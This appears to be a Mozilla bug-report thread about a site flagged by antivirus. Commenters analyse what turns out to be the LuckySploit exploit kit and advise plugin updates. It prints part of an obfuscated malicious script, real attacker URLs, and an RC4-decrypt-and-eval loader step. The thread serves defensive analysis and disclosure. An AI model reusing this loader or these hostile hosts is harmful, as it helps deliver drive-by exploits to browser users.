YV+RDI+PTZ+FBY+CDX+IVT+VEH+OUK+SFO+IVQ+PPP+QNO+QLM+HGB+JHI+CSW+XKE+GTD+JRN+FBR+MES+JTV+ZEP+WLV+UYY+SCU+THC+ITS+WKO+DJY+NNE+XZD+YCS+DMS+TUT+NMV+WJP+SOC+BGO+FQR+SJT+UMQ+GKO+VKD+TSQ+GSR+YFF+VVG+FZI+RIB+ELM+EEM+KEG+DLU+HQM+ULD+XBG+JHY+RLI+PTK+XQP+CJF+ZQD+CFN+FSN+ZMZ+XHM+ZWL+MZW+JBW+RYC+EPR+IFW+RVX+DJB+FMZ+MVG+WCE+BGG+VXM+CJK+FHH+QIK+UJN+FSD+THP+MUX+SKK+TTN+ZUE+DNL+WXE+PGD+MRE+MBG+LQY+JLC+FGY+SKE+HIQ+OTG+LJY+KFB+UYZ+JBM+GLV+UZO+UXE+IMT+WXG+SER+NSH+XRW+LWK+DPK+NOR+BLZ+JFO+JGV+XDX+UUR+QCS+RDP+QHX+RXN+CBB+GWH+YEY+XPY+RQG+SVL+UGL+IMV+SRZ+QET+BJI+ZYV+RRS+TCY+IKJ+VEI+VIJ+LDU+LDB+BVS+MLR+MPT+YCJ+GRJ+KUG+GJW+JSJ+ETR+GGE+FGI+LZI+YBX+UEE+MZQ+RYU+RMG+RJV+OEW+DFK+FHJ+LNY+EMM+DXF+PNV+CYI+BMK+QRK+CWN+JCP+NBM+YRQ+FLY+JHG+SPK+GUY+QLG+NVM+WYR+QHI+RHZ+NFK+UUP+FXN+LJQ+FOC+EIH+ZNY+BEK+XEU+RHF+FSZ+BQB+ECE+KKH+XFK+JTE+WYE+FJK+CKZ+ZBH+CLM+VSV+XGQ+YTM+RPK+XUH+EGB+GIH+STU+MQG+VWP+PBP+QYD+WPN+VUH+NBX+MNH+JDL+SMR+CQC+GBO+WIN+VNX+ZLD+TGF+XQN+SEX+NJJ+JWY+FMF+YCV+NYS+EXC+OPX+TVN+FWZ+SXS+KWX+YTG+RYS+VTX+JVP+QDI+YHI+FBO+WLW+EDH+CYQ+SNG+IVE+XMT+TBM+CZM+KJT+MBJ+ZYK+MQT+LXR+CLP+MPM+ZVE+IFV+EUF+GUP+FNQ+WBQ+MFY+TLI+GMF+QBJ+UNQ+IGZ+SPZ+QPN+ULZ+VIG+ULP+LXF+LUH+ZGG+VGH+UTN+FMC+UHB+SQY+ODJ+XPR+UXP+DWB+QOM+BOU+VVI+LHQ+JYX+NPD+NSX+OYN+MZZ+NTH+PPV+VLY+KWK+LNF+FDN+CBX+ZXB+QHV+VRG+CEV+BGJ+SOJ+QWQ+WOG+LHI+NEH+UMB+QVI+BQC+ELP+HGN+TSZ+ZIG+LMW+YWB+SJE+YGM+QBX+HKB+DZE+HJO+SHX+YGL+EQD+HEE+KNF+QFN+EQP+JVX+TDB+HRN+XQR+ZFH+VMV+CHH+PDZ+VCG+JWT+TJO+ITC+ONM+LCS+JYO+BND+PID+EVV+FKS+DUD+IOS+QKG+ITW+HZG+IIU+EPJ+YCU+WXT+LLX+UDZ+WVM+VRZ+ZTP+IXM+ZGJ+DCB+NYP+COL+KWC+NTW+CUD+UJS+MTR+HQO+SDY+NVR+JRZ+LWN+RQW+YOC+ITK+KYD+CBR+WJH+BHC+DOY+FUG+JIO+BYE+XGM+HEN+MUI+BJX+XWW+QDG+KTP+SSV+YHP+LDI+WQJ+YGZ+CWY+YER+XGS+YNF+UTD+VLC+BKO+RJT+HXB+UHG+GTO+NIG+EQT+QDJ+JEF+LCT+VBF+HXU+LCP+GFW+VYK+QGV+KBR+CLT+LXD+VWB+YPJ+UGG+EPB+VWT+WLZ+HPY+LUZ+TPB+JGD+JSB+NXX+TIR+EJN+YMJ+GJB+XBW+GYG+RGT+DQV+XMO+UCM+OUC+EDS+DPH+ONX+SQI+HER+PGF+IQD+LFP+HIP+LIQ+BHX+NBN+QTV+CMD+XIM+PTB+QWR+FHQ+ONB+OOR+HNE+YHF+PQJ+KKD+GUC+CRQ+ERP+FHV+TYT+GYP+PXY+HCZ+VCX+SOM+FCO+IKV+JPT+NIJ+GIC+JCZ+DXC+LOS+PGZ+QVZ+KTM+CVZ+DCT+DSQ+PSB+GTQ+YQT+LSN+LZT+UST+UMI+FYD+QEU+WLR+CLK+DWI+WBB+TUN+HVL+TNG+RZG+LXJ+ISY+LHB+BUO+CKY+DLS+DSS+DQY+XRN+HTI+ZJT+EIO+RMR+XKI+CZP+NFF+MXF+XNX+QFL+WXM+UWY+XYJ+OWU+CYY+WDR+NIU+HOH+WIU+CWU+UIX+ZRN+JSH+TXM+GHP+UVR+EMK+IFG+MDZ+UMY+FGQ+EDE+JTU+OMU+XEX+IEI+HHG+TFF+KVV+XZW+SQK+DFZ+IWG+ZNK+TQH+ULK+GFS+FOK+EUE+YDH+ZMX+SXL+RWO+DTN+XBQ+LKC+QBE+ZDU+USO+JKM+NFR+CSJ+XTU+EVB+UHD+BUM+DWL+JPY+RRL+OEH+IDX+SIL+IGD+JYR+IGP+XGU+UYR+HSQ+KXC+GHD+GKJ+THB+QVM+MRC+YTR+EOR+UXH+SSS+MYO+PJM+VEZ+DSN+WCI+VGI+TQK+JDY+CMV+VHO+KNM+GYE+ZMC+SKW+ZHX+JWF+IZC+GPT+CFD+EHJ+SLX+UTV+ZSE+OIT+HUZ+KTE+BMC+PGV+BVE+ESL+PRR+FCI+MGO+HBG+FSM+YHG+CKC+REU+JVO+ITE+BES+JLW+JDJ+FSI+UUM+YGR+CFX+YGO+OYF+HIB+MTV+NQI+POP+QTT+RUU+BIY+GEH+LIB+BWU+MDN+QCX+VQF+LZD+NFH;eval(eval('KMSEEB'));</script></html>
I haven't tested it because I'm on Linux (wouldn't have done otherwise).. Since Firefox is not a AV I guess this is INVALID. It's not Firefox' job, it's the job of your AV software. Could a mod remove the link to the "virus-site"?
Status: UNCONFIRMED → RESOLVED
Closed: 16 years ago
Resolution: --- → INVALID
It's the "Generic Rootkit.dl.gen" trojan, not a virus. Firefox is NOT a virus scanner (or trojan, or worm or malware or whatever). For anti-virus protection, you still need a anti-virus tool on your computer. Firefox uses that to scan downloaded files (if possible), but not regular visits to websites. That's exactly what happened in your case. You did NOT get infected, even without an anti-virus tool : the trojan is only saved in the cache, and that's why Avast was triggered. But as long as you don't open that file directly (In File Explorer for instance), you're perfectly safe. For phishing and malware protection (this is an example if malware), a service by Google is used, but that's not the responsibility of Mozilla. See <http://www.mozilla.com/en-US/firefox/phishing-protection/>.
Status: RESOLVED → VERIFIED
When I went to the site in comment 0 I got the same code with the variable names scrambled the first time, then a 404 after that (even with cleared cookies). Anti-detection effort? It eval'd down to a bunch of crypto code that generated an opaque string that added a script tag to the page, source http://odile-marco.com/tomi/?9bef4e41370ac5be2fe1ab87e0c0174fcf91fd8d28637cc382adcd34515ea16f746a8d692113a651717057c89688c0b5b48a8823f0d3e94f6d0157f55a97d676 That contained the obfuscated code k='Xooc4d4V8ac4KnSMCwddiSUbl3Iq4GxP6Av9Ic5w+6+ofsnJ2riCMwHMb+Q4VJmBEGIEzKmsjJ9Ev4+kcrdvAMVGwbB1C1E7wGjWafSRezRrsVfxhRs2Cvd0Trgr5GgSbyQjyAIMuRyor+M8texIaCZHDyi8TX3hoEu8qJ3hv4GpXo8SSmZ4m9yXGAOvM279EsZ7Bt7Yfy89bAgNO1UlU4hK0mtdWTcV+Iv1YyjUDJb9UnjBmJdTm/mjdMTrIMptj6D0ikYq7tp3cSmtysHkwjPLr97jMoc55LdBkJSbGcpRQGFf233Qzm1Srgqz2FKxt5Q=';t=eval('rc4Decrypt')(nextkey,hexToString(k));eval(t); which has the result of including another script http://odile-marco.com/tomi/?23f81944af79b10dd0b7810165b6c0b338581819c38ddfc7e7b1a4334145bc9e470f7de67cd67b7830ed2daa458bd047915c5ff2552e9dc1c406733e5bf4da1f which was the same kind of obfuscation and decrypted to nextkey='';k='';attack_level=0;;try{f='Welcome to LuckySploit:) \n ITS TOASTED';}catch(e){} Which does... nothing. But this was enough to track down some good write ups on this. This is known as the "LuckySploit" toolkit and is used several different attacks, with the ability to plug in new exploits as found and new payloads as desired by the bad guys. Apparently if I'd had the vulnerabilities it was looking for it would have sent back software versions in that last request, before the "23f819..." key, and the server would've handed back an exploit that would attack me. Popular ones currently include some recent PDF, Flash, and Java vulnerabilities that might affect Firefox users in addition to some IE-only attacks. It's possible your virus scanner noticed the signature of this toolkit before any harm was done as Jo said, but it's also possible that if you had older versions of a vulnerable plugin that real malware got installed. Please make sure that if you have any of the following it's at least the version mentioned: Flash 10.0 r22 Adobe Acrobat 9.1.0 Java 1.6 update 13 (some places called Java 6, update 13) QuickTime 7.6 Info about LuckySploit: http://www.finjan.com/MCRCblog.aspx?EntryId=2213 http://www.sophos.com/blogs/sophoslabs/v/post/3632 I've reported the site to Google's badware service, hopefully they'll scan and block it soon.
(In reply to comment #1) > I haven't tested it because I'm on Linux (wouldn't have done otherwise).. Since > Firefox is not a AV I guess this is INVALID. It's not Firefox' job, it's the > job of your AV software. If you didn't examine it then you don't know it wasn't using a Firefox exploit to attack people. If it were this would be very much VALID and in fact an emergency. Please don't be so quick to invalidate such bugs, send mail to security@mozilla.org or find us on IRC so we can investigate. They so far have all turned out to be exploits using known plugin flaws, but we can't let that make us so complacent that we miss a real attack.
You need to log in before you can comment on or make changes to this bug.